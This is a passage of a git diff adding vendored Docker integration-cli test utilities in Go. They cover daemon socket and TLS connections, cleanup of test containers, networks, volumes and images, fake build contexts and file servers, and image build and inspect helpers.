WindowsBaseImage = "microsoft/windowsservercore" + + // isolation is the isolation mode of the daemon under test + isolation container.Isolation + + // daemonPid is the pid of the main test daemon + daemonPid int + + daemonKernelVersion string +) + +const ( + // DefaultImage is the name of the base image for the majority of tests that + // are run across suites + DefaultImage = "busybox" +) + +func init() { + reexec.Init() + if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" { + dockerBinary = dockerBin + } + var err error + dockerBinary, err = exec.LookPath(dockerBinary) + if err != nil { + fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err) + os.Exit(1) + } + if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" { + registryImageName = registryImage + } + if registry := os.Getenv("REGISTRY_URL"); registry != "" { + privateRegistryURL = registry + } + workingDirectory, _ = os.Getwd() + + // Deterministically working out the environment in which CI is running + // to evaluate whether the daemon is local or remote is not possible through + // a build tag. + // + // For example Windows to Linux CI under Jenkins tests the 64-bit + // Windows binary build with the daemon build tag, but calls a remote + // Linux daemon. + // + // We can't just say if Windows then assume the daemon is local as at + // some point, we will be testing the Windows CLI against a Windows daemon. + // + // Similarly, it will be perfectly valid to also run CLI tests from + // a Linux CLI (built with the daemon tag) against a Windows daemon. + if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 { + isLocalDaemon = false + } else { + isLocalDaemon = true + } + + // TODO Windows CI. This are incorrect and need fixing into + // platform specific pieces. + // This is only used for a tests with local daemon true (Linux-only today) + // default is "/var/lib/docker", but we'll try and ask the + // /info endpoint for the specific root dir + dockerBasePath = "/var/lib/docker" + type Info struct { + DockerRootDir string + ExperimentalBuild bool + KernelVersion string + } + var i Info + status, b, err := sockRequest("GET", "/info", nil) + if err == nil && status == 200 { + if err = json.Unmarshal(b, &i); err == nil { + dockerBasePath = i.DockerRootDir + experimentalDaemon = i.ExperimentalBuild + daemonKernelVersion = i.KernelVersion + } + } + volumesConfigPath = dockerBasePath + "/volumes" + containerStoragePath = dockerBasePath + "/containers" + + if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 { + WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE") + fmt.Println("INFO: Windows Base image is ", WindowsBaseImage) + } + + dest := os.Getenv("DEST") + b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid")) + if err == nil { + if p, err := strconv.ParseInt(string(b), 10, 32); err == nil { + daemonPid = int(p) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go new file mode 100644 index 0000000000..749e4b3357 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_utils.go @@ -0,0 +1,1607 @@ +package main + +import ( + "bufio" + "bytes" + "crypto/tls" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/http/httputil" + "net/url" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/httputils" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/go-connections/tlsconfig" + units "github.com/docker/go-units" + "github.com/go-check/check" +) + +func init() { + cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}") + cmd.Env = appendBaseEnv(true) + out, err := cmd.CombinedOutput() + if err != nil { + panic(fmt.Errorf("err=%v\nout=%s\n", err, out)) + } + images := strings.Split(strings.TrimSpace(string(out)), "\n") + for _, img := range images { + protectedImages[img] = struct{}{} + } + + res, body, err := sockRequestRaw("GET", "/info", nil, "application/json") + if err != nil { + panic(fmt.Errorf("Init failed to get /info: %v", err)) + } + defer body.Close() + if res.StatusCode != http.StatusOK { + panic(fmt.Errorf("Init failed to get /info. Res=%v", res)) + } + + svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server")) + daemonPlatform = svrHeader.OS + if daemonPlatform != "linux" && daemonPlatform != "windows" { + panic("Cannot run tests against platform: " + daemonPlatform) + } + + // Now we know the daemon platform, can set paths used by tests. + var info types.Info + err = json.NewDecoder(body).Decode(&info) + if err != nil { + panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err)) + } + + daemonStorageDriver = info.Driver + dockerBasePath = info.DockerRootDir + volumesConfigPath = filepath.Join(dockerBasePath, "volumes") + containerStoragePath = filepath.Join(dockerBasePath, "containers") + // Make sure in context of daemon, not the local platform. Note we can't + // use filepath.FromSlash or ToSlash here as they are a no-op on Unix. + if daemonPlatform == "windows" { + volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1) + containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1) + // On Windows, extract out the version as we need to make selective + // decisions during integration testing as and when features are implemented. + // eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550 + windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1]) + } else { + volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1) + containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1) + } + isolation = info.Isolation +} + +func convertBasesize(basesizeBytes int64) (int64, error) { + basesize := units.HumanSize(float64(basesizeBytes)) + basesize = strings.Trim(basesize, " ")[:len(basesize)-3] + basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + if err != nil { + return 0, err + } + return int64(basesizeFloat) * 1024 * 1024 * 1024, nil +} + +func daemonHost() string { + daemonURLStr := "unix://" + opts.DefaultUnixSocket + if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { + daemonURLStr = daemonHostVar + } + return daemonURLStr +} + +func getTLSConfig() (*tls.Config, error) { + dockerCertPath := os.Getenv("DOCKER_CERT_PATH") + + if dockerCertPath == "" { + return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") + } + + option := &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + + return tlsConfig, nil +} + +func sockConn(timeout time.Duration, daemon string) (net.Conn, error) { + if daemon == "" { + daemon = daemonHost() + } + daemonURL, err := url.Parse(daemon) + if err != nil { + return nil, fmt.Errorf("could not parse url %q: %v", daemon, err) + } + + var c net.Conn + switch daemonURL.Scheme { + case "npipe": + return npipeDial(daemonURL.Path, timeout) + case "unix": + return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) + case "tcp": + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. + tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + dialer := &net.Dialer{Timeout: timeout} + return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) + } + return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) + default: + return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) + } +} + +func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return -1, nil, err + } + + res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json") + if err != nil { + return -1, nil, err + } + b, err := readBody(body) + return res.StatusCode, b, err +} + +func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { + return sockRequestRawToDaemon(method, endpoint, data, ct, "") +} + +func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, daemon) + if err != nil { + return nil, nil, err + } + + resp, err := client.Do(req) + if err != nil { + client.Close() + return nil, nil, err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + defer resp.Body.Close() + return client.Close() + }) + + return resp, body, nil +} + +func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, "") + if err != nil { + return nil, nil, err + } + + client.Do(req) + conn, br := client.Hijack() + return conn, br, nil +} + +func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) { + c, err := sockConn(time.Duration(10*time.Second), daemon) + if err != nil { + return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) + } + + client := httputil.NewClientConn(c, nil) + + req, err := http.NewRequest(method, endpoint, data) + if err != nil { + client.Close() + return nil, nil, fmt.Errorf("could not create new request: %v", err) + } + + if ct != "" { + req.Header.Set("Content-Type", ct) + } + return req, client, nil +} + +func readBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) +} + +func deleteContainer(container ...string) error { + result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...) + return result.Compare(icmd.Success) +} + +func getAllContainers() (string, error) { + getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a") + out, exitCode, err := runCommandWithOutput(getContainersCmd) + if exitCode != 0 && err == nil { + err = fmt.Errorf("failed to get a list of containers: %v\n", out) + } + + return out, err +} + +func deleteAllContainers() error { + containers, err := getAllContainers() + if err != nil { + fmt.Println(containers) + return err + } + if containers == "" { + return nil + } + + err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...) + if err != nil { + fmt.Println(err.Error()) + } + return err +} + +func deleteAllNetworks() error { + networks, err := getAllNetworks() + if err != nil { + return err + } + var errors []string + for _, n := range networks { + if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { + continue + } + if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { + // nat is a pre-defined network on Windows and cannot be removed + continue + } + status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil) + if err != nil { + errors = append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllNetworks() ([]types.NetworkResource, error) { + var networks []types.NetworkResource + _, b, err := sockRequest("GET", "/networks", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &networks); err != nil { + return nil, err + } + return networks, nil +} + +func deleteAllPlugins() error { + plugins, err := getAllPlugins() + if err != nil { + return err + } + var errors []string + for _, p := range plugins { + status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil) + if err != nil { + errors = append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllPlugins() (types.PluginsListResponse, error) { + var plugins types.PluginsListResponse + _, b, err := sockRequest("GET", "/plugins", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &plugins); err != nil { + return nil, err + } + return plugins, nil +} + +func deleteAllVolumes() error { + volumes, err := getAllVolumes() + if err != nil { + return err + } + var errors []string + for _, v := range volumes { + status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) + if err != nil { + errors = append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllVolumes() ([]*types.Volume, error) { + var volumes volumetypes.VolumesListOKBody + _, b, err := sockRequest("GET", "/volumes", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &volumes); err != nil { + return nil, err + } + return volumes.Volumes, nil +} + +var protectedImages = map[string]struct{}{} + +func deleteAllImages() error { + cmd := exec.Command(dockerBinary, "images") + cmd.Env = appendBaseEnv(true) + out, err := cmd.CombinedOutput() + if err != nil { + return err + } + lines := strings.Split(string(out), "\n")[1:] + var imgs []string + for _, l := range lines { + if l == "" { + continue + } + fields := strings.Fields(l) + imgTag := fields[0] + ":" + fields[1] + if _, ok := protectedImages[imgTag]; !ok { + if fields[0] == "" { + imgs = append(imgs, fields[2]) + continue + } + imgs = append(imgs, imgTag) + } + } + if len(imgs) == 0 { + return nil + } + args := append([]string{"rmi", "-f"}, imgs...) + if err := exec.Command(dockerBinary, args...).Run(); err != nil { + return err + } + return nil +} + +func getPausedContainers() (string, error) { + getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a") + out, exitCode, err := runCommandWithOutput(getPausedContainersCmd) + if exitCode != 0 && err == nil { + err = fmt.Errorf("failed to get a list of paused containers: %v\n", out) + } + + return out, err +} + +func getSliceOfPausedContainers() ([]string, error) { + out, err := getPausedContainers() + if err == nil { + if len(out) == 0 { + return nil, err + } + slice := strings.Split(strings.TrimSpace(out), "\n") + return slice, err + } + return []string{out}, err +} + +func unpauseContainer(container string) error { + return icmd.RunCommand(dockerBinary, "unpause", container).Error +} + +func unpauseAllContainers() error { + containers, err := getPausedContainers() + if err != nil { + fmt.Println(containers) + return err + } + + containers = strings.Replace(containers, "\n", " ", -1) + containers = strings.Trim(containers, " ") + containerList := strings.Split(containers, " ") + + for _, value := range containerList { + if err = unpauseContainer(value); err != nil { + return err + } + } + + return nil +} + +func deleteImages(images ...string) error { + args := []string{dockerBinary, "rmi", "-f"} + return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error +} + +func imageExists(image string) error { + return icmd.RunCommand(dockerBinary, "inspect", image).Error +} + +func pullImageIfNotExist(image string) error { + if err := imageExists(image); err != nil { + pullCmd := exec.Command(dockerBinary, "pull", image) + _, exitCode, err := runCommandWithOutput(pullCmd) + + if err != nil || exitCode != 0 { + return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err) + } + } + return nil +} + +func dockerCmdWithError(args ...string) (string, int, error) { + if err := validateArgs(args...); err != nil { + return "", 0, err + } + result := icmd.RunCommand(dockerBinary, args...) + if result.Error != nil { + return result.Combined(), result.ExitCode, result.Compare(icmd.Success) + } + return result.Combined(), result.ExitCode, result.Error +} + +func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + + result := icmd.RunCommand(dockerBinary, args...) + // TODO: why is c ever nil? + if c != nil { + c.Assert(result, icmd.Matches, icmd.Success) + } + return result.Stdout(), result.Stderr(), result.ExitCode +} + +func dockerCmd(c *check.C, args ...string) (string, int) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + result := icmd.RunCommand(dockerBinary, args...) + c.Assert(result, icmd.Matches, icmd.Success) + return result.Combined(), result.ExitCode +} + +func dockerCmdWithResult(args ...string) *icmd.Result { + return icmd.RunCommand(dockerBinary, args...) +} + +func binaryWithArgs(args ...string) []string { + return append([]string{dockerBinary}, args...) +} + +// execute a docker command with a timeout +func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result { + if err := validateArgs(args...); err != nil { + return &icmd.Result{Error: err} + } + return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout}) +} + +// execute a docker command in a directory +func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path}) + return result.Combined(), result.ExitCode, result.Error +} + +// execute a docker command in a directory with a timeout +func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result { + if err := validateArgs(args...); err != nil { + return &icmd.Result{Error: err} + } + return icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs(args...), + Timeout: timeout, + Dir: path, + }) +} + +// validateArgs is a checker to ensure tests are not running commands which are +// not supported on platforms. Specifically on Windows this is 'busybox top'. +func validateArgs(args ...string) error { + if daemonPlatform != "windows" { + return nil + } + foundBusybox := -1 + for key, value := range args { + if strings.ToLower(value) == "busybox" { + foundBusybox = key + } + if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { + return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()") + } + } + return nil +} + +// find the State.ExitCode in container metadata +func findContainerExitCode(c *check.C, name string, vargs ...string) string { + args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name) + cmd := exec.Command(dockerBinary, args...) + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + return out +} + +func findContainerIP(c *check.C, id string, network string) string { + out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) + return strings.Trim(out, " \r\n'") +} + +func getContainerCount() (int, error) { + const containers = "Containers:" + + cmd := exec.Command(dockerBinary, "info") + out, _, err := runCommandWithOutput(cmd) + if err != nil { + return 0, err + } + + lines := strings.Split(out, "\n") + for _, line := range lines { + if strings.Contains(line, containers) { + output := strings.TrimSpace(line) + output = strings.TrimLeft(output, containers) + output = strings.Trim(output, " ") + containerCount, err := strconv.Atoi(output) + if err != nil { + return 0, err + } + return containerCount, nil + } + } + return 0, fmt.Errorf("couldn't find the Container count in the output") +} + +// FakeContext creates directories that can be used as a build context +type FakeContext struct { + Dir string +} + +// Add a file at a path, creating directories where necessary +func (f *FakeContext) Add(file, content string) error { + return f.addFile(file, []byte(content)) +} + +func (f *FakeContext) addFile(file string, content []byte) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + dirpath := filepath.Dir(fp) + if dirpath != "." { + if err := os.MkdirAll(dirpath, 0755); err != nil { + return err + } + } + return ioutil.WriteFile(fp, content, 0644) + +} + +// Delete a file at a path +func (f *FakeContext) Delete(file string) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + return os.RemoveAll(fp) +} + +// Close deletes the context +func (f *FakeContext) Close() error { + return os.RemoveAll(f.Dir) +} + +func fakeContextFromNewTempDir() (*FakeContext, error) { + tmp, err := ioutil.TempDir("", "fake-context") + if err != nil { + return nil, err + } + if err := os.Chmod(tmp, 0755); err != nil { + return nil, err + } + return fakeContextFromDir(tmp), nil +} + +func fakeContextFromDir(dir string) *FakeContext { + return &FakeContext{dir} +} + +func fakeContextWithFiles(files map[string]string) (*FakeContext, error) { + ctx, err := fakeContextFromNewTempDir() + if err != nil { + return nil, err + } + for file, content := range files { + if err := ctx.Add(file, content); err != nil { + ctx.Close() + return nil, err + } + } + return ctx, nil +} + +func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error { + if err := ctx.Add("Dockerfile", dockerfile); err != nil { + ctx.Close() + return err + } + return nil +} + +func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil { + return nil, err + } + return ctx, nil +} + +// FakeStorage is a static file server. It might be running locally or remotely +// on test host. +type FakeStorage interface { + Close() error + URL() string + CtxDir() string +} + +func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) { + ctx, err := fakeContextFromNewTempDir() + if err != nil { + return nil, err + } + for name, content := range archives { + if err := ctx.addFile(name, content.Bytes()); err != nil { + return nil, err + } + } + return fakeStorageWithContext(ctx) +} + +// fakeStorage returns either a local or remote (at daemon machine) file server +func fakeStorage(files map[string]string) (FakeStorage, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + return fakeStorageWithContext(ctx) +} + +// fakeStorageWithContext returns either a local or remote (at daemon machine) file server +func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) { + if isLocalDaemon { + return newLocalFakeStorage(ctx) + } + return newRemoteFileServer(ctx) +} + +// localFileStorage is a file storage on the running machine +type localFileStorage struct { + *FakeContext + *httptest.Server +} + +func (s *localFileStorage) URL() string { + return s.Server.URL +} + +func (s *localFileStorage) CtxDir() string { + return s.FakeContext.Dir +} + +func (s *localFileStorage) Close() error { + defer s.Server.Close() + return s.FakeContext.Close() +} + +func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) { + handler := http.FileServer(http.Dir(ctx.Dir)) + server := httptest.NewServer(handler) + return &localFileStorage{ + FakeContext: ctx, + Server: server, + }, nil +} + +// remoteFileServer is a containerized static file server started on the remote +// testing machine to be used in URL-accepting docker build functionality. +type remoteFileServer struct { + host string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712 + container string + image string + ctx *FakeContext +} + +func (f *remoteFileServer) URL() string { + u := url.URL{ + Scheme: "http", + Host: f.host} + return u.String() +} + +func (f *remoteFileServer) CtxDir() string { + return f.ctx.Dir +} + +func (f *remoteFileServer) Close() error { + defer func() { + if f.ctx != nil { + f.ctx.Close() + } + if f.image != "" { + deleteImages(f.image) + } + }() + if f.container == "" { + return nil + } + return deleteContainer(f.container) +} + +func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) { + var ( + image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) + container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) + ) + + if err := ensureHTTPServerImage(); err != nil { + return nil, err + } + + // Build the image + if err := fakeContextAddDockerfile(ctx, `FROM httpserver +COPY . /static`); err != nil { + return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err) + } + if _, err := buildImageFromContext(image, ctx, false); err != nil { + return nil, fmt.Errorf("failed building file storage container image: %v", err) + } + + // Start the container + runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + return nil, fmt.Errorf("failed to start file storage container. ec=%v\nout=%s\nerr=%v", ec, out, err) + } + + // Find out the system assigned port + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp")) + if err != nil { + return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out) + } + + fileserverHostPort := strings.Trim(out, "\n") + _, port, err := net.SplitHostPort(fileserverHostPort) + if err != nil { + return nil, fmt.Errorf("unable to parse file server host:port: %v", err) + } + + dockerHostURL, err := url.Parse(daemonHost()) + if err != nil { + return nil, fmt.Errorf("unable to parse daemon host URL: %v", err) + } + + host, _, err := net.SplitHostPort(dockerHostURL.Host) + if err != nil { + return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err) + } + + return &remoteFileServer{ + container: container, + image: image, + host: fmt.Sprintf("%s:%s", host, port), + ctx: ctx}, nil +} + +func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) { + str := inspectFieldJSON(c, name, field) + err := json.Unmarshal([]byte(str), output) + if c != nil { + c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) + } +} + +func inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name) + out, exitCode, err := runCommandWithOutput(inspectCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func inspectFieldWithError(name, field string) (string, error) { + return inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +func inspectField(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectFieldJSON(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("json .%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectFieldMap(c *check.C, name, path, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectMountSourceField(name, destination string) (string, error) { + m, err := inspectMountPoint(name, destination) + if err != nil { + return "", err + } + return m.Source, nil +} + +func inspectMountPoint(name, destination string) (types.MountPoint, error) { + out, err := inspectFilter(name, "json .Mounts") + if err != nil { + return types.MountPoint{}, err + } + + return inspectMountPointJSON(out, destination) +} + +var errMountNotFound = errors.New("mount point not found") + +func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { + var mp []types.MountPoint + if err := json.Unmarshal([]byte(j), &mp); err != nil { + return types.MountPoint{}, err + } + + var m *types.MountPoint + for _, c := range mp { + if c.Destination == destination { + m = &c + break + } + } + + if m == nil { + return types.MountPoint{}, errMountNotFound + } + + return *m, nil +} + +func inspectImage(name, filter string) (string, error) { + args := []string{"inspect", "--type", "image"} + if filter != "" { + format := fmt.Sprintf("{{%s}}", filter) + args = append(args, "-f", format) + } + args = append(args, name) + inspectCmd := exec.Command(dockerBinary, args...) + out, exitCode, err := runCommandWithOutput(inspectCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func getIDByName(name string) (string, error) { + return inspectFieldWithError(name, "Id") +} + +// getContainerState returns the exit code of the container +// and true if it's running +// the exit code should be ignored if it's running +func getContainerState(c *check.C, id string) (int, bool, error) { + var ( + exitStatus int + running bool + ) + out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id) + if exitCode != 0 { + return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out) + } + + out = strings.Trim(out, "\n") + splitOutput := strings.Split(out, " ") + if len(splitOutput) != 2 { + return 0, false, fmt.Errorf("failed to get container state: output is broken") + } + if splitOutput[0] == "true" { + running = true + } + if n, err := strconv.Atoi(splitOutput[1]); err == nil { + exitStatus = n + } else { + return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer") + } + + return exitStatus, running, nil +} + +func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd { + return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...) +} + +func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd { + args := []string{} + if host != "" { + args = append(args, "--host", host) + } + args = append(args, "build", "-t", name) + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, "-") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Stdin = strings.NewReader(dockerfile) + return buildCmd +} + +func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) { + buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", out, fmt.Errorf("failed to build the image: %s", out) + } + id, err := getIDByName(name) + if err != nil { + return "", out, err + } + return id, out, nil +} + +func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) { + buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) { + id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...) + return id, err +} + +func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) { + id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...) + if err != nil { + return "", err + } + return id, nil +} + +func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ".") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Dir = ctx.Dir + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", "", fmt.Errorf("failed to build the image: %s", out) + } + id, err := getIDByName(name) + if err != nil { + return "", "", err + } + return id, out, nil +} + +func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ".") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Dir = ctx.Dir + + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ctx.RepoURL) + buildCmd := exec.Command(dockerBinary, args...) + + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, path) + buildCmd := exec.Command(dockerBinary, args...) + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to build 